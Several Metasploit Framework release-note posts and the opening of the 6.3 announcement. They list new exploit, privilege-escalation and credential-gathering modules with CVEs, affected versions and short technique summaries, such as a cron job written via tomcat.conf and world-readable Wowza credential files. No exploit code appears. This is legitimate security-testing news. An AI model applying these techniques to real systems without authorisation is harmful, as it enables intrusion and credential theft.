This week we’ve released a module written by first time community contributor shr70 that can exploit roughly 45 different Zyxel router and VPN models. The module exploits a buffer overflow vulnerability that results in unauthenticated remote code execution on affected devices. It’s rare we see a module affect this many devices once and are excited to see this ship in the framework. We hope pentesters and red-teamers alike can make good use of this module in their day to day operations.
Monitorr unauthenticated RCE
Community contributor h00die-gr3y strikes again this time with a module for an Unauthenticated RCE vulnerability in Monitorr. Monitorr is a simple web application that allows you to set up a dashboard to monitor various web sites / web applications up or down state. Vulnerable versions allow an attacker to upload a webshell tagged as a GIF image and execute malicious php code in the upload directory where the malicious file is stored.
More Metasploit Twitch Streaming
In case you missed it or were previously unaware, our very own Spencer McIntyre has been doing live exploit development on Twitch the second Friday of the month at 4pm EST. This past week Spencer (aka zerosteiner) shared in real time the trials and tribulations of reverse engineering an authenticated SolarWinds information service deserialization RCE. The pull request for this work can be found here: https://github.com/rapid7/metasploit-framework/pull/17785. In the live stream he explained how he takes a blog posted with limited technical details, decompiles and debugs the application to figure out what makes the vulnerability tick. Come watch the next on Friday April 14th, at: https://www.twitch.tv/zerosteiner, there’s a good chance you’ll learn something new and be sure to invite your family and friends!
New module content (4)
Zyxel Unauthenticated LAN Remote Code Execution
Authors: Gerhard Hechenberger, SEC Consult Vulnerability Lab, Stefan Viehboeck, Steffen Robertz, and Thomas Weber
Type: Exploit
Pull request: #17388 contributed by shr70
Description: This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
Authors: Lyhins Lab and h00die-gr3y
Type: Exploit
Pull request: #17771 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28871
Description: This adds a module that exploits an unauthenticated file upload vulnerability in various versions of Monitorr. RCE as the user under which the software runs can be achieved due to insufficient validation on GIF uploads.
Open Web Analytics 1.7.3 – Remote Code Execution (RCE)
Authors: Dennis Pfleger and Jacob Ebben
Type: Exploit
Pull request: #17754 contributed by Pflegusch
AttackerKB reference: CVE-2022-24637
Description: This adds an exploit module for CVE-2022-24637, a single/double quote confusion vulnerability in Open Web Analytics versions below 1.7.4. This leads to the disclosure of sensitive information in an automatically generated PHP cache file, which can be leveraged to gain admin privileges and remote code execution.
Description: This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.
Enhancements and features (2)
#17401 from araout42 – This PR adds a new x86 XOR polymorphic encoder.
#17583 from cgranleese-r7 – Enhances msfconsole’s info -d command, which is used to generate browser Metasploit module documentation, to additionally include references to AttackerKB.
#17783 from adfoster-r7 – An update has been made to the reload_lib command so that it continues to reload files even if a single file fails to load.
#17784 from dwelch-r7 – Reduces the amount of files loaded when msfconsole start up. This was a performance regression introduced by a recent Rails upgrade.
#17792 from adfoster-r7 – Fixes external module crash for when running the auxiliary/scanner/wproxy/att_open_proxy module.
#17794 from adfoster-r7 – Update external modules to support python3.11.
#17798 from adfoster-r7 – The debug --datastore command was previously causing a stacktrace due to some incorrect operations. These have since been fixed so that users can now use debug --datastore to output debug information along with the datastore information.
#17802 from zeroSteiner – Updates Python pingback payloads such as payload/python/pingback_reverse_tcp to no longer crash when viewing info or generating.
Documentation added (1)
#17795 from adfoster-r7 – This PR adds documentation on debugging and running external python modules.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Whilst we did have a few cool new modules added this week, one particularly interesting one was a Fortinet FortiNAC vulnerability, CVE-2022-39952, that was added in by team member Jack Heysel. This module exploits an unauthenticated RCE in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7 to gain root level access to affected devices. This bug has seen active exploitation in the wild from several threat feeds such as ShadowServer at https://twitter.com/Shadowserver/status/1628140029322362880, so definitely patch if you haven’t done so already.
Tomcat Gives Me All The Shells
One other exploit we did want to call out this week was a local privilege escalation on Apache Tomcat prior to 7.0.54-8. Tomcat is widely deployed in a lot of environments, and this PR, exploiting CVE-2016-5425, allows you to escalate from an authenticated user to full root control over a web server by exploiting a file permissions issue. These vulnerabilities can be quite beneficial to attackers looking to gain further access to a network as often they will compromise a web server and then use that web server to start pivoting deeper into the network. Gaining root access to a web server can further assist them with these efforts. It’s also rather unusual to see a web server specifically being used to assist with local privilege escalation as most exploits tend to focus on using them to gain initial access, so we appreciate the efforts from h00die to add this into Metasploit.
Authors: Gwendal Guégniaud, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #17750 contributed by jheysel-r7
AttackerKB reference: CVE-2022-39952
Description: A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC’s keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.
Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation
Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17509 contributed by h00die
AttackerKB reference: CVE-2016-5425
Description: This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8, allowing attackers to inject commands into the systemd-tmpfiles service to write a cron job that will execute their payload. Successful exploitation should result in privilege escalation to the root user.
Bitbucket Environment Variable RCE
Authors: Ry0taK, Shelby Pace, and y4er
Type: Exploit
Pull request: #17775 contributed by space-r7
AttackerKB reference: CVE-2022-43781
Description: This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing the Bitbucket application into generating a diff. This module requires at least admin credentials. Successful exploitation results in RCE as the atlbitbucket user.
Enhancements and features (1)
#17757 from adfoster-r7 – Updates the formatting logic for info command to improve the readability of the module description. Previously the module description was squashed into a single line, but now each paragraph and bullet list etc will be rendered on their own new lines.
Bugs fixed (1)
#17774 from adfoster-r7 – A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.
Documentation added (1)
#17780 from gwillcox-r7 – This updates the list of mentors for GSoC 2023.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Wowza, a new credential gatherer and login scanner!
This week Metasploit Framework gained a credential gatherer for Wowza Streaming Engine Manager. Credentials for this application are stored in a file named admin.password in a known location and the file is readable by default by BUILTIN\Users on Windows and is world readable on Linux.. The module was written by community contributor bcoles who also wrote a login scanner for Wowza this week. The login scanner can be used to validate the credentials found by the gatherer. The two modules complement each other quite nicely.
New module content (3)
Wowza Streaming Engine Manager Login Utility
Author: bcoles
Type: Auxiliary
Pull request: #17733 contributed by bcoles
Description: This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.
Authors: Sw33t.0day and h00die-gr3y
Type: Exploit
Pull request: #17507 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-22952
Description: A module has been added which exploits CVE-2023-22952, a RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.
Gather Wowza Streaming Engine Credentials
Author: bcoles
Type: Post
Pull request: #17737 contributed by bcoles
Description: This adds a post module that collects Wowza Streaming Engine user credentials from the admin.password local configuration file. This file is world-readable by default on Linux and readable by BUILTIN\Users on Windows.
Enhancements and features (9)
#17675 from adfoster-r7 – Updates the admin/kerberos/forge_ticket to support a new extra_sids option which can be useful for including cross-domain SIDs for forging external Kerberos trust tickets as part of cross-trust domain escalation. The admin/kerberos/inspect_ticket has also been updated to support viewing these extra SID values.
#17686 from zeroSteiner – This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. Note that it won’t work after the December 2021 patch.
#17715 from zeroSteiner – The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the arp command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the route command on Windows.
#17727 from rohitkumarankam – Two new options have been added to the login scanner library: max_consecutive_error_count and max_error_count. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.
#17744 from adfoster-r7 – The code for msfconsole has been updated so that performance profiling can also take into account the time it takes to load msfenv and console related libraries, thereby allowing for more accurate performance profiling.
#17745 from gwillcox-r7 – This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the route add and route delete commands as well as the ability to get process information such as process names and paths.
#17746 from todb-r7 – The data/wordlists/password.lst password list has been updated to include the master password that LastPass suggests as an example when a user goes to create a new master password, r50$K28vaIFiYxaY, into the password list, as well as to fix some encoding issues.
#17749 from adfoster-r7 – Updates the auxiliary/admin/kerberos/keytab.rb module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in Wireshark.
#17756 from adfoster-r7 – Updates secrets dump to generate the Kerberos RC4 key for the machine account.
Bugs fixed (8)
#17673 from bcoles – lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.
#17716 from zeroSteiner – A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.
#17721 from zeroSteiner – This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.
#17723 from jvoisin – A bug has been fixed in the modules/encoders/php/base64.rb encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.
#17726 from zeroSteiner – The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the route command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running getprivs.
#17729 from bcoles – Fixes an edge case crash when running Ruby 3.2
#17738 from adfoster-r7 – Fix Ruby 3.2 crash when running certain tools
#17758 from zeroSteiner – The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using getprivs, fix a error in packet_transmit_http whereby error codes were not appropriately returned, and update the arp command to properly return the interface name instead of the index for the interface column.
Documentation added (3)
#17684 from adfoster-r7 – This PR adds the RBCD exploitation documentation to the docs site.
#17688 from adfoster-r7 – This PR fixes several broken wiki links, as well as adding validation to users users don’t use the wrong syntax when making docs changes.
#17743 from adfoster-r7 – A new page has been added to explain the METASPLOIT_CPU_PROFILE and METASPLOIT_MEMORY_PROFILE options and to explain how to profile msfconsole‘s and msfvenom‘s performance on systems.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Rapid7’s broader vulnerability research team released our 2022 Vulnerability Intelligence Report this week. The report includes Metasploit and research team data on exploitation, exploitability, and vulnerability profiles that are intended to help security teams understand and prioritize risk more effectively. Put simply, security teams have way too much to do in a threat climate that’s seen some pretty crazy escalation the past few years, and understanding attack trends can help them make better risk-based choices.
There are some longer threads on key findings on Twitter and Mastodon. Some of the highlights:
Rapid7 researchers saw a modest decrease in both widespread exploitation and zero-day exploitation of new vulnerabilities in 2022. Alas, widespread threats are still the majority of 2022 vulnerabilities in our dataset, and are double what they were in 2020.
Attackers keep getting faster — more than half the vulns in the report were exploited within a week.
Ransomware CVE stats got weird in 2022. There are probably a lot of intersectional reasons for this.
Author: Imran E. Dawoodjee
Type: Auxiliary
Pull request: #17676 contributed by ide0x90
Description: This adds a login module for the Softing Secure Integration Server software.
Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload
Authors: HMs, l1k3beef, and sf
Type: Exploit
Pull request: #17624 contributed by sfewer-r7
AttackerKB reference: CVE-2022-21587
Description: This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution. This has been observed to have been exploited in the wild.
Lucee Authenticated Scheduled Job Code Execution
Author: Alexander Philiotis
Type: Exploit
Pull request: #17638 contributed by JBince
Description: This adds a module to execute code using Lucee’s scheduled job functionality. The feature requires authentication as an administrator by default and allows a ColdFusion page to be rendered which is used to execute an OS command using the cfexecte directive. The module works on both Linux and Windows targets.
Disable ClamAV
Author: DLL_Cool_J
Type: Post
Pull request: #17672 contributed by archcloudlabs
Description: This PR includes a post module that will disable ClamAV on Linux systems. The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command which will disable ClamAV.
Enhancements and features (2)
#17635 from dwelch-r7 – Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum
#17699 from gwillcox-r7 – This adds SCHANNEL authentication support to LDAP modules.
Bugs fixed (5)
#17562 from gwillcox-r7 – This fixes some incorrect Railgun definitions for the wldap32 Windows library.
#17679 from adfoster-r7 – This PR fixes the broken payload selection for Metasploit RPC
#17696 from zeroSteiner – The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
#17697 from jheysel-r7 – This updates the exploit/linux/http/froxlor_log_path_rce module to note that Foxlor 2.0.7 is the last vulnerable version.
#17700 from zeroSteiner – The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.
Documentation added (3)
#17680 from adfoster-r7 – Improves the UX of the docs.metasploit.com module explorer. Adds ‘expand all’ and ‘collapse all’ buttons to the module explorer. Adds support for automatically opening descendant folders that only contain 1 item. Adds an additional parent folder to make it clearer to the user that the folders are clickable.
#17687 from archcloudlabs – This PR contains additional examples on the ERB format required for the HTTPRawHeaders option for HTTP clients.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
This week two improvements were made to the script/resource/basic_discovery.rc resource script. The first update from community member samsepi0x0 allowed commas in the RHOSTS value, making it easier to target multiple hosts. Additionally, adfoster-r7 improved the script by adding better handling for error output. This continues our trend of trying to provide more useful diagnostic information to our end users.
Google Summer of Code
The Metasploit Framework has been accepted to participate in Google’s Summer of Code program again for 2023. This event pairs new contributors with an experienced mentor as they work on an open source project (Metasploit in our case). We will soon be soliciting project proposals from the community for anyone interested in getting involved. Some project ideas are on the docs site, but folks are welcome to submit entirely new ideas for something they think would benefit the Metasploit community.
Web Based Module Counts
This week, adfoster-r7 improved our docs site with a running count of all the published modules. This information is kept up to date automatically and is a great resource for anyone looking for how many modules Metasploit has included without needing to install and start the framework. The page even allows users to dive deeper into types of modules and platforms in the same way as msfconsole.
New module content (2)
Froxlor Log Path RCE
Authors: Askar and jheysel-r7
Type: Exploit
Pull request: #17640 contributed by jheysel-r7
AttackerKB reference: CVE-2023-0315
Description: This module exploits a vulnerability in versions of Froxlor prior to 2.0.8 that allows an authenticated user to change the default log file to an arbitrary path on the system. Using this, an authenticated user can write a Twig template, that when rendered, will execute arbitrary code and grant a shell or Meterpreter session as the www-data user.
pyLoad js2py Python Execution
Authors: Spencer McIntyre and bAu
Type: Exploit
Pull request: #17652 contributed by zeroSteiner
AttackerKB reference: CVE-2023-0297
Description: This adds an exploit for CVE-2023-0297 which is an unauthenticated Javascript injection in pyLoad’s Click ‘N’ Load service.
Enhancements and features (1)
#17674 from adfoster-r7 – Updates the script/resource/basic_discovery.rc script to better detect when the Metasploit database is not connected as well as improving error output.
Bugs fixed (2)
#17650 from samsepi0x0 – Updates the script/resource/basic_discovery.rc script to support commas in RHOSTS values.
#17660 from bugch3ck – This updates the location of where registry hives are temporarily stored by the windows_secrets_dump module.
#17663 from manishkumarr1017 – This fixes an issue where action names were being treated as case sensitive.
Documentation added (2)
#17637 from adfoster-r7 – This PR adds the latest module information to docs.metasploit.com as a quick way to explore Metasploit’s available modules.
#17685 from samsepi0x0 – Fixes a broken link within Metasploit’s Google Summer of Code 2023 Project Ideas.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Thanks to community contributor neterum, Metasploit framework just gained an awesome new module which targets Cisco Small Business RV Series Routers. The module actually exploits two vulnerabilities, an authentication bypass CVE-2022-20705 and a command injection vulnerability CVE-2022-20707 in order to achieve code execution in the context of user www-data.
New module content (2)
Cisco RV Series Authentication Bypass and Command Injection
Authors: Biem Pham, Neterum, and jbaines-r7
Type: Exploit
Pull request: #17599 contributed by neterum
Attacker KB Reference: CVE-2022-20707
Description: An exploit for Cisco RV160, RV260, RV340 and RV345 Small Business Routers prior to firmware version 1.0.03.26 has been added which exploits CVE-2022-20705, an authentication bypass, and CVE-2022-20707, a command injection vulnerability, to achieve remote code execution as the www-data user on affected devices as an unauthenticated attacker.
GitLab GitHub Repo Import Deserialization RCE
Authors: Heyder Andrade, RedWay Security, and William Bowling (vakzz)
Type: Exploit
Pull request: #17281 contributed by heyder
AttackerKB reference: CVE-2022-2992
Description: This adds an exploit for CVE-2022-2992 which is authenticated remote command execution in GitLab.
Enhancements and features (1)
#17594 from zeroSteiner – The DLL template code has been updated so that tools such as msfvenom can use DLL templates with payloads that were larger than 4096 bytes, such as unstaged payloads. Note that this update only applies to the default DLL templates that Metasploit provides, and not to external DLL templates which are restricted to 4096 bytes at this time.
Bugs fixed (1)
#17645 from adfoster-r7 – Fixes a bug that caused warnings to be output on Arch Linux environments when starting msfconsole
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Taking a stroll down memory lane (Tomcat Init Script Privilege Escalation)
Do you remember the issue with Tomcat init script that was originally discovered by Dawid Golunski back in 2016 that led to privilege escalation? This week’s Metasploit release includes an exploit module for CVE-2016-1240 by h00die. This vulnerability allows any local users who already have tomcat accounts to perform privilege escalation and gain access to a target system as a root user. This exploit can be used against the following tomcat versions Tomcat 8 (8.0.36-2), Tomcat 7 (7.0.70-2) and Tomcat 6 (6.0.45+dfsg-1~deb8u1).
Lenovo Diagnostics Driver IOCTL memmove
Our own Jack Heysel contributed an exploit module for CVE-2022-3699 using the proof of concept created by alfarom256. A vulnerability within Lenovo Diagnostics Driver due to incorrect access control allows low-privileged users to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.
New module content (8)
Nagios XI 5.5.6 to 5.7.5 – ConfigWizards Authenticated Remote Code Execution
Author: Matthew Mathur
Type: Exploit
Pull request: #17494 contributed by k0pak4
AttackerKB reference: CVE-2021-25298
Description: A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the apache user on NagiosXI devices running version 5.5.6 to 5.7.5 inclusive.
F5 Big-IP Create Admin User
Author: Ron Bowes
Type: Exploit
Pull request: #17392 contributed by rbowes-r7
Description: This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account.
Apache Tomcat on Ubuntu Log Init Privilege Escalation
Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17483 contributed by h00die
AttackerKB reference: CVE-2016-1240
Description: Adds a new exploit/linux/local/tomcat_ubuntu_log_init_priv_esc module for CVE-2016-1240 targetting Tomcat (6, 7, 8). By default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system.
Fortra GoAnywhere MFT Unsafe Deserialization RCE
Author: Ron Bowes
Type: Exploit
Pull request: #17607 contributed by rbowes-r7
AttackerKB reference: CVE-2023-0669
Description: This PR adds a module that exploits CVE-2023-0669, which is an object deserialization vulnerability in Fortra GoAnywhere MFT.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, and horizon3ai
Type: Exploit
Pull request: #17556 contributed by cdelafuente-r7
AttackerKB reference: CVE-2022-47966
Description: This PR adds an exploit that uses an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ADSelfService Plus versions 6210 and below (https://github.com/advisories/GHSA-4w3v-83v8-mg94).
ManageEngine ServiceDesk Plus Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, and horizon3ai
Type: Exploit
Pull request: #17527 contributed by cdelafuente-r7
AttackerKB reference: CVE-2022-47966
Description: This adds an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below. (https://github.com/advisories/GHSA-4w3v-83v8-mg94).
ManageEngine Endpoint Central Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, h00die-gr3y, and horizon3ai
Type: Exploit
Pull request: #17567 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-47966
Authors: alfarom256 and jheysel-r7
Type: Exploit
Pull request: #17371 contributed by jheysel-r7
AttackerKB reference: CVE-2022-3699
Description: This PR adds a module that makes use of incorrect access control for the Lenovo Diagnostics Driver allowing a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.
Enhancements and features (3)
#17597 from bcoles – Fix notes for SideEffects and Reliability in the auxiliary/dos/mirageos/qubes_mirage_firewall_dos module.
#17603 from dwelch-r7 – Updates admin/kerberos/inspect_ticket to show the UPN and DNS Information within a decrypted PAC.
#17615 from adfoster-r7 – Adds missing module notes for stability, reliability, and side effects to several modules.
Bugs fixed (2)
#17591 from zeroSteiner – A bug has been fixed in metasm_shell and nasm_shell whereby the shells were using readline but the dependency wasn’t correctly imported. This has since been fixed and improved validation has been added.
#17592 from zeroSteiner – A bug has been fixed in the bypassuac_injection_winsxs module whereby a string was not properly being treated as being NULL terminated. Additionally, the definitions of the FindFirstFileA and FindFirstFileW functions have been corrected so that they work on x64 systems.
Documentation added (3)
#17398 from bwatters-r7 – Adds additional details on using command stagers.
#17587 from adfoster-r7 – This PR updates docs.metasploit.com to use the latest ruby conventions.
#17595 from mkonda – Updates the documentation on debugging dead Meterpreter sessions to use the correct option name ReverseListenerBindAddress.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Earlier this week we announced the release of Metasploit 6.3 which came with a tonne of new modules and improvements.
The whole team worked super hard on this and we’re very excited that everyone can now get their hands on it and all of the new features it has to offer!
I won’t go over everything we did here because we have a whole separate blog post dedicated to the 6.3 release that you should check out if you missed it.
Dirty Cow available on macOS
We have a new module provided by timwr to exploit Dirty Cow on macOS. This module exploits a race condition in the kernel that gives the opportunity for a user to get code execution as root.
New module content (5)
CWP login.php Unauthenticated RCE
Authors: Numan Türle and Spencer McIntyre
Type: Exploit
Pull request: #17511 contributed by zeroSteiner
AttackerKB reference: CVE-2022-44877
Description: Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.
io_uring Same Type Object Reuse Priv Esc
Authors: Mathias Krause, Ryota Shiga, and h00die
Type: Exploit
Pull request: #17301 contributed by h00die
AttackerKB reference: CVE-2022-1043
Description: This module exploits Linux LPE CVE-2022-1043, a bug in io_uring leading to an additional put_cred() that can be exploited to hijack credentials of other processes.
vmwgfx Driver File Descriptor Handling Priv Esc
Authors: Mathias Krause and h00die
Type: Exploit
Pull request: #17300 contributed by h00die
AttackerKB reference: CVE-2022-22942
Description: This PR adds a linux privilege escalation against VMWare virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMWare driver bug.
macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Authors: Ian Beer, Zhuowei Zhang, and timwr
Type: Exploit
Pull request: #17415 contributed by timwr
AttackerKB reference: CVE-2022-46689
Description: This module is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root.
Description: Post credential capture module Veeam Backup & Recovery and Veeam ONE Monitor versions 9.x – 11.x.
Enhancements and features (11)
#16946 from cgranleese-r7 – Updates the show targets and show actions command to display a visual indicator beside the currently selected value.
#17481 from h00die – An update has been made to the modules/auxiliary/scanner/http/options.rb module to modernize a few of its options, tidy up the code, and to handle an edge case when a target server might respond with a Tomcat error page.
#17504 from ErikWynter – Two aliases for show favorites have been added, namely favorite -l and favorites, to allow for easier listing of modules that users have marked as their favorites.
#17560 from adfoster-r7 – Updates the Kerberos inspect_ticket module to show unsupported pac buffer ul_types in a clearer way to the user.
#17563 from bcoles – Improves documentation and code quality for modules/exploits/multi/local.
#17564 from serializingme – Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module.
#17570 from zeroSteiner – The list of default queries used by the ldap_query module has been updated to add in the ENUM_DOMAIN and ENUM_MACHINE_ACCOUNT_QUOTA queries and to make some small updates to existing queries.
#17575 from zeroSteiner – Updates the Kerberos ccache functionality to automatically perform sname switching on Service Tickets when the ticket sname does not match the Metasploit module’s required sname. This allows for a service ticket associated with the SPN service_a/host.domain.local to be used and updated to service_b/host.domain.local dynamically as part of service authentication.
#17577 from bcoles – Updates modules/exploits/qnx to run the check command before attempting to exploit the target.
#17581 from bcoles – This PR modifies the conditions in 45 local privilege escalation modules to check whether the operator set ForceExploit to true before checking the permissions required for exploitation on the remote target, which is more efficient and quieter over the network.
Bugs fixed (4)
#17444 from hamax97 – A bug has been fixed whereby issuing a command line argument that contained nested equals signs would not be parsed correctly, and would instead be treated as two separate command line statements.
#17557 from zeroSteiner – This fixes the logon timestamp in the MS14-068 exploit so the generated ticket works.
#17558 from cgranleese-r7 – Fixes running msfconsole’s analyze command crashing when a WinRM session was opened.
#17561 from gwillcox-r7 – This fixes the direction for some Railgun function definitions in iphlpapi.
Documentation added (1)
#17565 from adfoster-r7 – Updates the docs site to add color to Metasploit console examples.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
The Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.
Background
Kerberos is an authentication protocol that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it’s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.
Kerberos and Active Directory more broadly have been prime attack targets for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a technical whitepaper on a slew of novel attack techniques targeting Active Directory Certificate Services (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.
More than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.
New in Metasploit 6.3
Metasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.
Highlights include:
Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM
The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS
Kerberos ticket inspection and debugging via the auxiliary/admin/kerberos/inspect_ticket module and the auxiliary/admin/kerberos/keytab module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark
Fully automated privilege escalation via Certifried (CVE-2022–26923)
